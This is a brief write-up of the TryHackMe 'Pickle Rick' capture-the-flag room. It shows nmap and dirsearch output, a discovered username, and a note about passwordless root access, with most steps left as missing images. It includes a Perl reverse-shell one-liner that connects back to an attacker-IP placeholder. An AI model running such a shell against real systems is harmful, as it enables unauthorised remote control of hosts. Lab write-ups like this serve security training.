Tryhackme Pickle Rick writeup !!

 Pickle Rick is a Rick and Morty themed tryhackme room where we exploit a webserver to find 3 ingredients or flags.

Image for postYooua

Port Scanning

Starting Nmap 7.80 ( https://nmap.org ) at 2020–04–10 15:35 IST
Nmap scan report for 10.10.222.8
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.54 seconds
Image for post
Image for post
Note to self, remember username!

Username: R1ckRul3s

More Enumeration!!!!!

I used dirsearch to find out interesting directories and files.

[15:49:33] 301 -  311B  - /assets  ->  http://10.10.222.8/assets/
[15:49:40] 200 - 1KB - /index.html
[15:49:42] 200 - 882B - /login.php
[15:49:47] 200 - 17B - /robots.txt
Image for post
Image for post
Image for post
Image for post
Image for post
perl -e 'use Socket;$i="ATTACKER-IP";$p=LISTENING-PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Image for post
Look around the file system for the other ingredient.
Image for post
Image for post

We can use any command as root without password!!!

Image for post

Comments